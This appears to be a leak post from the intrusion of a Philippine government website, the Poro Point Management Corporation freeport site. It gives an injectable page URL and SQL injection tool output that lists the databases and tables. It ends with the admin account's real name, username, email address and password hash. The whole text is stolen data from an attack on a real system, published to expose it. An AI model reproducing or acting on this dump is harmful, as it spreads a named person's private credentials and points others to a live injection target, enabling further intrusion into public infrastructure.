.gov Government

.ph Filipinler

ISP Bitstop Inc

Poro Point Management Corporation, Poro Point, City of San Fernando, La Union, Philippines

Poro Point Management Corporation A Subsidiary Of Base Conversion And Development Authority

http://poropointfreeport.gov.ph/n.php?id=687

available databases [2]:
[+] information_schema
[+] porodb

Database: porodb
[10 tables]
+---------------+
| active_guests |
| active_users  |
| banned_users  |
| htp_album     |
| htp_category  |
| htp_entries   |
| htp_gallery   |
| htp_photos    |
| mail          |
| users         |
+---------------+

Database: porodb
Table: users
[1 entry]
+------------------+----------+--------------------------+----------------------------------+
| name             | username | email                    | password                         |
+------------------+----------+--------------------------+----------------------------------+
| Inigo T. Balagot | admin    | itorresbalagot@yahoo.com | 48775286c7ee183b2c26e530e21e484b |
+------------------+----------+--------------------------+----------------------------------+
